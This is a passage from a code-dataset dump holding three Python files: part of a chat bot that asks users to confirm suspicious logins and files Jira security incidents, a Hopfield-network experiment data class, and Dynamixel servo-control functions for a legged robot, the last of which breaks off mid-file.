usertype, userlogin)\n\n\n# обрабатываем команды для бота, вводимые пользователем в чат\ndef bot_cmd_handler(bot, event):\n global BOT_ALIVE\n CMD_CHAT = namedtuple(\"CMD_CHAT\", \"cmd command_body arg1 args_next\")\n\n template_cmd = re.compile(r\"/(?P(?:(\\S+)))\\s*\"\n r\"(?P(?:(\\S+|)))\\s*\"\n r\"(?P(?:(\\S+|)))\\s*\"\n r\"(?P(?:(\\S+|\\s+|)+))\", re.VERBOSE)\n match = template_cmd.match(event.text)\n if not match:\n return False\n cmd_from_chat = CMD_CHAT(\n cmd=match.groupdict()['cmd'],\n command_body=match.groupdict()['command_body'],\n arg1=match.groupdict()['arg1'],\n args_next=match.groupdict()['args_next']\n )\n logger.debug(f'Command: {format(event.text)}')\n if cmd_from_chat.cmd == \"help\":\n send_msg(event.from_chat, 'Usage for registration:\\n /reg network|server userlogin')\n elif cmd_from_chat.cmd == \"show\" and cmd_from_chat.arg1 == 'users':\n show_users = ('{0:%s}' % cmd_from_chat.command_body).format(USERS)\n send_msg(USER_ADMIN_CHAT_ID, show_users)\n elif cmd_from_chat.cmd == \"ping\":\n text = str(BOT_ALIVE)\n send_msg(USER_ADMIN_CHAT_ID, text)\n else:\n BOT_ALIVE = False\n text = 'Бот запущен ...'\n send_msg(event.from_chat, text)\n return True\n\n\n# если есть Событие - бот пишет юзеру запрос (если юзер известен), или пишет в админскую чат-группу (если юзер Unknown)\ndef start_dlg():\n logger.debug(f'{start_dlg.__name__}. LEN LogEventsQueue: {len(LogEventsQueue)}')\n\n while LogEventsQueue:\n log_event : EventLogClass = LogEventsQueue.popleft()\n logger.debug(f'{start_dlg.__name__}. Username: {log_event.username}')\n if log_event.username is not UNKNOWN_USER:\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n\\n{}'.format(MSG_USER_PING, log_event.login,\n log_event.date.strftime('%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n u: User = USERS.get_user(ALARM_TYPES[log_event.alarm_type], login=log_event.username)\n logger.debug(f'{start_dlg.__name__}. Username: {u}')\n send_msg(u.chat_id, text, with_buttons=True)\n current_date = datetime.now()\n log_event.set_request(current_date)\n log_event.set_hash(text)\n RequestEventsQueue.append(log_event)\n elif log_event.username is UNKNOWN_USER:\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n\\n{}'.format(MSG_ADMIN_UNKNOWN_USER, log_event.login,\n log_event.date.strftime('%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n log_event.descr = MSG_ADMIN_UNKNOWN_USER\n current_date = datetime.now()\n log_event.set_request(current_date)\n AlarmEventsQueue.append(log_event)\n check_alarm_queue()\n return True\n\n\n# обработчик ответов юзера для бота\n# если ответ - ДА, ничего не делаем, если НЕТ - создаём jira-инц\ndef reply_bot(bot, event, hash_log):\n logger.debug(f'{reply_bot.__name__}')\n global BOT_ALIVE\n if event.text.split(' ')[0] in BOT_COMMAND_LIST:\n return False\n if event.text[:1] == '/' and event.text.split(' ')[0] not in BOT_COMMAND_LIST:\n text = \"Мне не знакома команда [ \" + event.text + \" ] ...\"\n send_msg(event.from_chat, text)\n return False\n\n yes_list = ['yes', 'да', 'ага', 'ок', 'ok']\n no_list = ['no', 'нет']\n\n temp_queue = deque()\n temp_queue.extend(RequestEventsQueue)\n while temp_queue:\n log_event = temp_queue.popleft()\n user: User = USERS.get_user(ALARM_TYPES[log_event.alarm_type], chat_id=event.from_chat)\n\n if user:\n username = user.login\n else:\n username = UNKNOWN_USER\n\n logger.debug(f'LEN RequestEventsQueue: {len(RequestEventsQueue)}')\n if username == log_event.username:\n if event.text.lower() in yes_list:\n text = 'ok'\n logger.info(f'Chat: {event.from_chat}. Reply: {text}')\n send_msg(event.from_chat, text)\n log_event.set_reply()\n log_event.set_alarm(False)\n RequestEventsQueue.remove(log_event)\n return True\n elif event.text.lower() in no_list:\n log_event.set_reply()\n log_event.set_alarm(True)\n RequestEventsQueue.remove(log_event)\n log_event.descr = MSG_ADMIN_HACK_LOGIN\n AlarmEventsQueue.append(log_event)\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n{}'.format(MSG_ADMIN_HACK_LOGIN, log_event.username,\n log_event.date.strftime(\n '%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n logger.info(text)\n send_msg(event.from_chat, text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n check_alarm_queue()\n return True\n else:\n text = 'Варианты ответа: {} или {}'.format(str(yes_list), str(no_list))\n logger.info(text)\n send_msg(event.from_chat, text)\n return False\n\n # если боту написали что то ещё (не ответ на запрос)\n user_domain = event.from_chat.split('@')[1].strip()\n if user_domain not in MY_DOMAIN:\n new_username = event.from_chat.split('@')[0].strip()\n logger.warning(f'User is not in MRG/VK domain: {new_username}@{user_domain}')\n return False\n if not USERS.get_user(usertype=NETWORK, chat_id=event.from_chat) \\\n and not USERS.get_user(usertype=SERVER, chat_id=event.from_chat):\n text = f'Вы можете зарегистрироваться в боте через команду: /reg {NETWORK}|{SERVER} userlogin'\n secure_bot.send_text(event.from_chat, text)\n return True\n\n\n# проверяем истёк ли таймаут юзера REPLY_TIMEOUT для ответа на запрос бота,\n# если истёк - переносим Событие из очереди Request в очередь Alarm\n@_safe_queue\ndef check_event_timeout():\n temp_queue = deque()\n temp_queue.extend(RequestEventsQueue)\n while temp_queue:\n logger.debug(f'{check_event_timeout.__name__}. LEN RequestEventsQueue: {len(RequestEventsQueue)}')\n log_event = temp_queue.popleft()\n current_date = datetime.now()\n delta_time = current_date - log_event.request_time\n\n if log_event.request and not log_event.second_request and delta_time.seconds > int(REPLY_TIMEOUT * 0.7):\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n\\n{}'.format(\"RESEND\\n\" + MSG_USER_PING, log_event.login,\n log_event.date.strftime('%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n\n u: User = USERS.get_user(ALARM_TYPES[log_event.alarm_type], login=log_event.username)\n send_msg(u.chat_id, text)\n log_event.second_request = True\n elif log_event.request and delta_time.seconds > REPLY_TIMEOUT:\n text = f'{MSG_ADMIN_ALARM_TIMEOUT}.\\n\\n{log_event.text}'\n u: User = USERS.get_user(ALARM_TYPES[log_event.alarm_type], login=log_event.username)\n send_msg(u.chat_id, text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n RequestEventsQueue.remove(log_event)\n AlarmEventsQueue.append(log_event)\n check_alarm_queue()\n return True\n\n\n# создаём jira-инциденты для событий в очереди Alarm\n# ссылку на jira-инц отправляем юзеру (если он известен), в админскую чат-группу и в Телеграм чат\n@_safe_queue\ndef check_alarm_queue():\n logger.debug(f'{check_alarm_queue.__name__}. LEN AlarmEventsQueue: {len(AlarmEventsQueue)}')\n\n while AlarmEventsQueue:\n log_event = AlarmEventsQueue.popleft()\n task_id = create_jira_issue(log_event)\n text = f\"{MSG_ADMIN_ALARM}: \" \\\n f\"{JIRA_URL}{task_id}\\n\" \\\n f\"{log_event.date.strftime('%d %B - %H:%M:%S')}\" \\\n f\"Host: {log_event.host}\" \\\n f\"Source IP: {log_event.src_ip}\" \\\n f\"{log_event.text}\"\n if log_event.username is not UNKNOWN_USER:\n u: User = USERS.get_user(ALARM_TYPES[log_event.alarm_type], login=log_event.username)\n send_msg(u.chat_id, text)\n\n send_msg(USER_ADMIN_CHAT_ID, text)\n text_to_chat = 'Created issue {}{}: {}: User: {}, Host: {}, Source: {}'.format(JIRA_URL, task_id, log_event.descr,\n log_event.login, log_event.host,\n log_event.src_ip)\n send_msg(MYTEAM_CRIT_CHAT, text_to_chat)\n logger.info(f'\\nCreate Jira Issue: {JIRA_URL}, Task: {task_id}\\n')\n return True\n\n\ndef create_jira_issue(log_event):\n user = log_event.login\n if log_event.username is UNKNOWN_USER:\n user = '{} ({})'.format(log_event.login, 'unknown user')\n time_issue_created_iso8601 = datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.0+0300\")\n header = \"{} (user: {})\".format(log_event.descr, log_event.login)\n descr = \"User: {}\\nHostname: {}\\nSource: {}\\nType: {}\\n{}\".format(user, log_event.host, log_event.src_ip,\n log_event.alarm_type,\n log_event.text)\n priority = {'Blocking': '1', 'Critical': '2', 'Major': '3', 'Minor': '4', 'Trivial': '5'}\n issue_hash = hashlib.md5(header.encode()).hexdigest()\n\n issue_dict = {\n 'project': {'key': 'INC'},\n 'priority': {'id': priority[JIRA_PRIORITY]},\n 'issuetype': {'name': 'Network'},\n 'summary': header,\n 'description': descr,\n # Trigger ID\n \"customfield_27407\": 'Security Incidient',\n \"customfield_27404\": time_issue_created_iso8601,\n # Hostname\n \"customfield_27409\": log_event.host,\n \"customfield_27408\": issue_hash,\n \"customfield_27406\": 'noc_secure_bot'\n }\n\n jira_options = {'server': CONFIG['jira']['server']}\n jira_consumer_key = CONFIG['jira']['consumer_key']\n jira_oauth_token_secret = CONFIG['jira']['oauth_token_secret']\n jira_oauth_token = CONFIG['jira']['oauth_token']\n jira_oauth_key_path = CONFIG['jira']['jira_rsa_key_path']\n data = ''\n\n try:\n with open(jira_oauth_key_path, 'r') as f:\n data = f.read()\n # if unable to read jira oauth rsa key\n except Exception as e:\n text = f'ERROR: {create_jira_issue.__name__}. {e}'\n logger.error(e)\n send_msg(USER_ADMIN_CHAT_ID, text)\n os._exit(-1)\n\n private_key = data.strip()\n\n oauth = {'access_token': jira_oauth_token, 'consumer_key': jira_consumer_key,\n 'access_token_secret': jira_oauth_token_secret, 'key_cert': private_key}\n try:\n jira = JIRA(options=jira_options, oauth=oauth)\n new_issue = jira.create_issue(fields=issue_dict)\n jira.kill_session()\n logger.debug(f'{create_jira_issue.__name__}')\n return new_issue.key\n # can't access jira server\n except Exception as e:\n text = f'ERROR: {create_jira_issue.__name__}. {e}'\n logger.error(e)\n send_msg(USER_ADMIN_CHAT_ID, text)\n\n\n# чтение базы зарегистрированных юзеров\ndef read_user_db(db_table):\n users_db = dict()\n try:\n conn = sqlite3.connect(DB_FILENAME)\n cursor = conn.cursor()\n query = 'SELECT * FROM {}'.format(db_table)\n cursor.execute(query)\n for row in cursor:\n users_db[row[0]] = row[1]\n conn.commit()\n cursor.close()\n conn.close()\n except sqlite3.Error as e:\n text = f'ERROR: cannot get [users] form DB: {e}'\n logger.error(text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n return False\n logger.debug(f'{read_user_db.__name__}')\n return users_db\n\n\n# запись/обновление юзера в базу зарегистрированных юзеров\ndef write_user_db(new_user, mode='write'):\n query_db = {'write': 'INSERT INTO %s (%s, %s) VALUES (?, ?)',\n 'update': 'UPDATE %s SET %s = ? WHERE %s = ?'}\n chat_id = 'chat_id'\n login = 'login'\n db_table = DB_TABLE[new_user.usertype]\n new_login = new_user.login\n new_chat_id = new_user.chat_id\n try:\n conn = sqlite3.connect(DB_FILENAME)\n cursor = conn.cursor()\n cursor.execute(query_db[mode] % (db_table, login, chat_id), (new_login, new_chat_id,))\n conn.commit()\n cursor.close()\n conn.close()\n except sqlite3.Error as e:\n text = f'{write_user_db.__name__}. {e}'\n logger.error(e)\n send_msg(USER_ADMIN_CHAT_ID, text)\n logger.debug(f'{write_user_db.__name__}')\n\n\ndef read_src_nets():\n logger.info(f'{read_src_nets.__name__}')\n global SRC_VALID_NETS\n try:\n with open(NETWORKS_FILENAME, 'r', encoding='utf8') as f:\n for line in f:\n line = line.split('#', 1)[0].strip()\n if line:\n SRC_VALID_NETS.append(line)\n except Exception as e:\n text = f'ERROR: cannot read SOURCE NETWORK file: {e}'\n logger.error(e)\n send_msg(USER_ADMIN_CHAT_ID, text)\n\n\n# MAIN #\ndef main():\n logger.info('Secure bot started...')\n global USERS, USERS_DEFAULT\n USERS.update_db(NETWORK, USERS_DEFAULT)\n USERS.update_db(SERVER, USERS_DEFAULT)\n USERS.update_db(NETWORK, read_user_db(DB_TABLE_NETWORK))\n USERS.update_db(SERVER, read_user_db(DB_TABLE_SERVER))\n\n logger.debug(f'User network list: {USERS.get_users(usertype=NETWORK)}')\n logger.debug(f'User server list: {USERS.get_users(usertype=SERVER)}')\n\n secure_bot.dispatcher.add_handler(CommandHandler(command='reg', callback=bot_cmd_reg_handler))\n secure_bot.dispatcher.add_handler(UnknownCommandHandler(callback=bot_cmd_handler))\n secure_bot.dispatcher.add_handler(MessageHandler(callback=reply_bot))\n secure_bot.dispatcher.add_handler(BotButtonCommandHandler(callback=buttons_answer_cb))\n secure_bot.start_polling()\n\n db_client = Client(CLICKHOUSE_HOST, port=CLICKHOUSE_PORT)\n query = DBQuery(\"NetworkHostListWithIP\",\n ['HostName', 'HostState', 'IP', 'HardwareModel_Name', 'NetworkRoles', 'OrgUnitName'],\n \"SELECT * FROM\")\n\n log_template_alarm_list = [\n CHECK_NETWORK_TEMPLATE,\n CHECK_SERVER_FAILED_LOGIN,\n CHECK_SERVER_SOURCE_IP_TEMPLATE]\n log_template_info_list = [CHECK_SERVER_SUCCESS_LOGIN]\n\n schedule.every(DB_REQUEST_INTERVAL).hours.do(read_src_nets)\n schedule.every(DB_REQUEST_INTERVAL).hours.do(clone_cmdb_to_local)\n schedule.every(DB_REQUEST_INTERVAL).hours.do(read_db, query)\n schedule.every(PARSE_LOG_INTERVAL).seconds.do(parse_log,\n db_client,\n log_template_alarm_list,\n log_template_info_list,\n [ALARM_TYPES[NETWORK], ALARM_TYPES[SERVER]])\n schedule.every(PARSE_LOG_INTERVAL).seconds.do(tac_queue_checker)\n schedule.every(PARSE_LOG_INTERVAL).seconds.do(secure_queue_checker)\n schedule.every(PARSE_LOG_INTERVAL).seconds.do(source_queue_checker)\n schedule.every(PARSE_LOG_INTERVAL).seconds.do(start_dlg)\n schedule.every(PARSE_LOG_INTERVAL).seconds.do(check_event_timeout)\n schedule.every(PARSE_LOG_INTERVAL).seconds.do(check_alarm_queue)\n schedule.run_all()\n\n try:\n while 1:\n try:\n schedule.run_pending()\n except Exception as e:\n logger.error(f'Unknown Error: {e}')\n os._exit(-1)\n sleep(SCHEDULE_TIMEOUT)\n except KeyboardInterrupt as err:\n db_client.disconnect()\n raise KeyboardInterrupt(err)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt as err:\n logger.info('Terminate script process by Ctrl-C')\n except Exception as err:\n logger.critical(f'Unknown exception: {err.with_traceback(sys.exc_info()[2])}')\n os._exit(-1)\n","sub_path":"sec_bot.py","file_name":"sec_bot.py","file_ext":"py","file_size_in_byte":47893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"51110847","text":"import numpy as np\nimport scipy.stats as sp\nimport matplotlib.pyplot as plt\n\nclass Data:\n \"\"\"Implements the data structures to handle results of an experiment.\n Elements (error, capacity, ...) can be stored\n for a particular value (number of patterns, flip ratio, ...)\n and a particular trial (network realisation)\n When a new element is added, the mean and error bar over all trials is updated\n\n Attributes:\n data (numpy.ndarray): Array of stored elements (number_of_values x number_of_trials)\n meanData (numpy.ndarray): Array of means of elements (averaged over all trials)\n errorBars (numpy.ndarray): Array of standard errors of the means\n \"\"\"\n\n def __init__(self, nValues, nTrials):\n \"\"\" Initialize an experiment\n Plot an empty figure\n \"\"\"\n self.data = np.zeros((nValues, nTrials))\n self.meanData = np.zeros(nValues)\n self.errorBars = np.zeros(nValues)\n plt.figure()\n\n def update(self, element, index, trial):\n \"\"\"Updates data structures with a new element\n\n Args:\n element (float): New element\n index (int): Index of the current value tested\n trial (int): Index of the current trial\n \"\"\"\n self.data[index, trial] = element\n # Recompute corresponding mean and error of the mean (considering the new element)\n self.meanData[index] = np.mean(self.data[index, :trial+1], axis=0)\n if trial != 0:\n \tself.errorBars[index] = sp.sem(self.data[index, :trial+1], axis=0, ddof=1)\n else:\n \tself.errorBars[index] = 0\n # http://stackoverflow.com/questions/27600207/why-does-numpy-std-give-a-different-result-to-matlab-std\n\n def clearPlot(self, xlim = [0, 1], ylim = [0, 1], title = 'Title', xlabel = 'x', ylabel = 'y'):\n plt.clf()\n plt.rcParams.update({'font.size': 15})\n plt.xlim(xlim)\n plt.ylim(ylim)\n plt.title(title, fontsize = 15)\n plt.xlabel(xlabel, fontsize = 15)\n plt.ylabel(ylabel, fontsize = 15)\n plt.tick_params(axis='both', which='major', labelsize=12)\n\n def updatePlot(self, values, index):\n \"\"\" Plots meanData in function of the values with error bars of length 2*errorBars\n Values with index from 0 to index (included) are plotted in black\n Values with index after index+1 (included) are plotted in light grey\n \"\"\"\n plt.errorbar(values[:index+1], self.meanData[:index+1], xerr=0, yerr=(self.errorBars[:index+1]), color='k', alpha=1.0)\n plt.errorbar(values[index+1:], self.meanData[index+1:], xerr=0, yerr=(self.errorBars[index+1:]), color='k', alpha=0.2)\n plt.draw()\n plt.pause(0.0001)\n\n def getMeans(self):\n return (self.meanData, self.errorBars)\n","sub_path":"customHopfieldNetwork/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"59713026","text":"import os\n\nif os.name == 'nt':\n import msvcrt\n def getch():\n return msvcrt.getch().decode()\nelse:\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n def getch():\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\nfrom dynamixel_sdk import *\n\nfrom MFRv2_Constants import *\n\n# Initialize PortHandler instance & Set the port path\nportHandler = PortHandler(DEVICENAME)\n\n\n# Initialize PacketHandler instance & Set the protocol version\npacketHandler = PacketHandler(PROTOCOL_VERSION)\n\n# Open port\nif portHandler.openPort():\n print(\"Succeeded to open the port\")\nelse:\n print(\"Failed to open the port\")\n print(\"Press any key to terminate...\")\n getch()\n quit()\n\n# Set port baudrate\nif portHandler.setBaudRate(BAUDRATE):\n print(\"Succeeded to change the baudrate\")\nelse:\n print(\"Failed to change the baudrate\")\n print(\"Press any key to terminate...\")\n getch()\n quit()\n\n\n\n#motor control functions:\n\ndef enableTorque(id):\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, id, XL_TORQUE_ENABLE, TORQUE_ENABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n # quit()\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Dynamixel#%d has been successfully connected\" % id)\n\ndef disableTorque(id):\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, id, XL_TORQUE_ENABLE, TORQUE_DISABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n # quit()\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Dynamixel#%d has been successfully disconnected\" % id)\n\ndef atPosition(goal, curr):\n if(abs(goal - curr) > DXL_MOVING_STATUS_THRESHOLD):\n return False\n return True\n\ndef atPositionCustom(goal, curr, threshold):\n if(abs(goal - curr) > threshold):\n return False\n return True\n\ndef getPos(id): #get position of motor\n # currPos, dxl_comm_result, dxl_error = packetHandler.read4ByteTxRx(portHandler, id, XL_PRESENT_POSITION)\n currPos = packetHandler.read4ByteTxRx(portHandler, id, XL_PRESENT_POSITION)[0]\n\n # if dxl_comm_result != COMM_SUCCESS:\n # print(\"getPos Error: %s\" % packetHandler.getTxRxResult(dxl_comm_result))\n # elif dxl_error != 0:\n # print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\n\n # ------- Eric Lara's patch for a read bug (error with negative integers) -----------\n dxl_present_16Byte_1 = (currPos & 0xFFFF)\n dxl_present_16Byte_2 = (currPos >> 16) & 0xFFFF\n\n # print('[%s, %s]' % (dxl_present_16Byte_1, dxl_present_16Byte_2) )\n\n if dxl_present_16Byte_1 < dxl_present_16Byte_2:\n multiply = 65535 - dxl_present_16Byte_2\n currPos = (dxl_present_16Byte_1 - 65535) - multiply*65535\n\n\t# -------------------------------------------------------------------------\n\n return currPos\n\ndef getVel(id):\n currVel, dxl_comm_result, dxl_error = packetHandler.read4ByteTxRx(portHandler, id, XL_PRESENT_VELOCITY)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"getPos Error: %s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\n return currVel\n\ndef getPosGoal(id):\n goalPos = packetHandler.read4ByteTxRx(portHandler, id, XL_GOAL_POSITION)[0]\n\n # ------- Eric Lara's patch for a read bug (error with negative integers) -----------\n dxl_present_16Byte_1 = (goalPos & 0xFFFF)\n dxl_present_16Byte_2 = (goalPos >> 16) & 0xFFFF\n\n # print('[%s, %s]' % (dxl_present_16Byte_1, dxl_present_16Byte_2) )\n\n if dxl_present_16Byte_1 < dxl_present_16Byte_2:\n multiply = 65535 - dxl_present_16Byte_2\n goalPos = (dxl_present_16Byte_1 - 65535) - multiply*65535\n\n\t# -------------------------------------------------------------------------\n\n return goalPos\n\ndef getVelGoal(id):\n currVel, dxl_comm_result, dxl_error = packetHandler.read4ByteTxRx(portHandler, id, XL_GOAL_VELOCITY)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"getPos Error: %s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\n return currVel\n\ndef getProfileVelocity(id):\n return packetHandler.read4ByteTxRx(portHandler, id, XL_PROFILE_VELOCITY)[0]\n\ndef switchControlMode(id, mode):\n print(\"Switching Motor \", id, \" to: \", mode)\n disableTorque(id)\n packetHandler.write1ByteTxRx(portHandler, id, XL_OPERATING_MODE, mode)\n enableTorque(id)\n\ndef switchControlModeAllLegs(mode):\n switchControlMode(RF_LEG_ID, mode)\n switchControlMode(RM_LEG_ID, mode)\n switchControlMode(RB_LEG_ID, mode)\n switchControlMode(LF_LEG_ID, mode)\n switchControlMode(LM_LEG_ID, mode)\n switchControlMode(LB_LEG_ID, mode)\n\ndef moveMotorPos(id, pos):\n dxl_comm_result, dxl_error = packetHandler.write4ByteTxRx(portHandler,id, XL_GOAL_POSITION, pos)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\ndef moveMotorVel(id, vel):\n dxl_comm_result, dxl_error = packetHandler.write4ByteTxRx(portHandler,id, XL_GOAL_VELOCITY, vel)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error)) \n\ndef moveTail(pitchPos, yawPos):\n # return (moveMotor(TAIL_YAW_ID, yawPos) and moveMotor(TAIL_PITCH_ID, pitchPos))\n moveMotorPos(TAIL_YAW_ID, yawPos)\n moveMotorPos(TAIL_PITCH_ID, pitchPos)\n return (tailAtPos())\n\ndef moveWings(lPos, rPos):\n # return (moveMotor(L_WING_ID, lPos) and moveMotor(R_WING_ID, rPos))\n moveMotorPos(L_WING_ID, lPos)\n moveMotorPos(R_WING_ID, rPos)\n # return (wingsAtPos())\n\ndef tailAtPos():\n return (atPosition(getPosGoal(TAIL_YAW_ID), getPos(TAIL_YAW_ID)) and atPositionCustom(getPosGoal(TAIL_PITCH_ID), getPos(TAIL_PITCH_ID), TAIL_MOVING_THRESHOLD))\n\ndef wingsAtPos():\n return (atPosition(getPosGoal(L_WING_ID), getPos(L_WING_ID)) and atPosition(getPosGoal(R_WING_ID), getPos(R_WING_ID)))\n\ndef legsAtPos():\n return (atPosition(getPosGoal(RF_LEG_ID), getPos(RF_LEG_ID)) and atPosition(getPosGoal(RM_LEG_ID), getPos(RM_LEG_ID)) and atPosition(getPosGoal(RB_LEG_ID), getPos(RB_LEG_ID)) and atPosition(getPosGoal(LF_LEG_ID), getPos(LF_LEG_ID)) and atPosition(getPosGoal(LM_LEG_ID), getPos(LM_LEG_ID)) and atPosition(getPosGoal(LB_LEG_ID), getPos(LB_LEG_ID)))\n\ndef moveLegsFromHome(pos):\n moveMotorPos(RF_LEG_ID, RF_LEG_HOME + pos)\n moveMotorPos(RM_LEG_ID, RM_LEG_HOME + pos)\n moveMotorPos(RB_LEG_ID, RB_LEG_HOME + pos)\n moveMotorPos(LF_LEG_ID, LF_LEG_HOME + pos)\n moveMotorPos(LM_LEG_ID, LM_LEG_HOME + pos)\n moveMotorPos(LB_LEG_ID, LB_LEG_HOME + pos)\n # return (legsAtPos())\n\ndef moveLegsOffset(pos):\n moveMotorPos(RF_LEG_ID, pos)\n moveMotorPos(RM_LEG_ID, 4096 - LEG_OFFSET + pos)\n moveMotorPos(RB_LEG_ID, pos)\n moveMotorPos(LF_LEG_ID, LEG_OFFSET + pos)\n moveMotorPos(LM_LEG_ID, pos)\n moveMotorPos(LB_LEG_ID, LEG_OFFSET + pos)\n # return (legsAtPos())\n\ndef setAllLegsVel(vel):\n moveMotorVel(RF_LEG_ID, vel)\n moveMotorVel(RM_LEG_ID, vel)\n moveMotorVel(RB_LEG_ID, vel)\n moveMotorVel(LF_LEG_ID, vel)\n moveMotorVel(LM_LEG_ID, vel)\n moveMotorVel(LB_LEG_ID, vel)\n\ndef setOffsetLegsVel(vel):\n moveMotorVel(RM_LEG_ID, vel)\n moveMotorVel(LF_LEG_ID, vel)\n moveMotorVel(LB_LEG_ID, vel)\n\ndef setNonOffsetLegsVel(vel):\n moveMotorVel(RF_LEG_ID, vel)\n moveMotorVel(RB_LEG_ID, vel)\n moveMotorVel(LM_LEG_ID, vel)\n\n# def moveLegsRelative(pos):\n# switchControlModeAllLegs(XL_POSITION_CONTROL)\n# moveLegsFromHome(pos)\n# switchControlModeAllLegs(XL_EXT_POSITION_CONTROL)\n\n# def offsetLegsFromHome():\n# moveMotorPos(RF_LEG_ID, RF_LEG_HOME)\n# moveMotorPos(RM_LEG_ID, RM_LEG_HOME - LEG_OFFSET)\n# moveMotorPos(RB_LEG_ID, RB_LEG_HOME)\n# moveMotorPos(LF_LEG_ID, LF_LEG_HOME + LEG_OFFSET)\n# moveMotorPos(LM_LEG_ID, LM_LEG_HOME)\n# moveMotorPos(LB_LEG_ID, LB_LEG_HOME + LEG_OFFSET)\n\n# while not (atPosition(RF_LEG_HOME, getPos(RF_LEG_ID)) and atPosition(LF_LEG_HOME + LEG_OFFSET, getPos(LF_LEG_ID))):\n# print(\"Offsetting Legs\", RF_LEG_HOME, getPos(RF_LEG_ID), LF_LEG_HOME + LEG_OFFSET, getPos(LF_LEG_ID))\n# time.sleep(0.01)\n\ndef setProfileVelocity(id, vel):\n dxl_comm_result, dxl_error = packetHandler.write4ByteTxRx(portHandler, id, XL_PROFILE_VELOCITY, vel)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\ndef setAllLegProfileVelocity(vel):\n setProfileVelocity(RF_LEG_ID, vel)\n moveMotorPos(RF_LEG_ID, getPosGoal(RF_LEG_ID))\n setProfileVelocity(RM_LEG_ID, vel)\n moveMotorPos(RM_LEG_ID, getPosGoal(RM_LEG_ID))\n setProfileVelocity(RB_LEG_ID, vel)\n moveMotorPos(RB_LEG_ID, getPosGoal(RB_LEG_ID))\n setProfileVelocity(LF_LEG_ID, vel)\n moveMotorPos(LF_LEG_ID, getPosGoal(LF_LEG_ID))\n setProfileVelocity(LM_LEG_ID, vel)\n moveMotorPos(LM_LEG_ID, getPosGoal(LM_LEG_ID))\n setProfileVelocity(LB_LEG_ID, vel)\n moveMotorPos(LB_LEG_ID, getPosGoal(LB_LEG_ID))\n\ndef setOffsetLegProfileVelocity(vel):\n setProfileVelocity(RM_LEG_ID, vel)\n moveMotorPos(RM_LEG_ID, getPosGoal(RM_LEG_ID))\n setProfileVelocity(LF_LEG_ID, vel)\n moveMotorPos(LF_LEG_ID, getPosGoal(LF_LEG_ID))\n setProfileVelocity(LB_LEG_ID, vel)\n moveMotorPos(LB_LEG_ID, getPosGoal(LB_LEG_ID))\n\ndef setNonOffsetLegProfileVelocity(vel):\n setProfileVelocity(RF_LEG_ID, vel)\n moveMotorPos(RF_LEG_ID, getPosGoal(RF_LEG_ID))\n setProfileVelocity(RB_LEG_ID, vel)\n moveMotorPos(RB_LEG_ID, getPosGoal(RB_LEG_ID))\n setProfileVelocity(LM_LEG_ID, vel)\n moveMotorPos(LM_LEG_ID, getPosGoal(LM_LEG_ID))\n\n\ndef enableAll():\n enableTorque(RF_LEG_ID)\n enableTorque(RM_LEG_ID)\n enableTorque(RB_LEG_ID)\n enableTorque(LF_LEG_ID)\n enableTorque(LM_LEG_ID)\n enableTorque(LB_LEG_ID)\n enableTorque(TAIL_YAW_ID)\n enableTorque(TAIL_PITCH_ID)\n enableTorque(R_WING_ID)\n enableTorque(L_WING_ID)\n\ndef disableAll():\n disableTorque(RF_LEG_ID)\n disableTorque(RM_LEG_ID)\n disableTorque(RB_LEG_ID)\n disableTorque(LF_LEG_ID)\n disableTorque(LM_LEG_ID)\n disableTorque(LB_LEG_ID)\n disableTorque(TAIL_PITCH_ID)\n disableTorque(TAIL_YAW_ID)\n disableTorque(R_WING_ID)\n disableTorque(L_WING_ID)\n\n## for motor 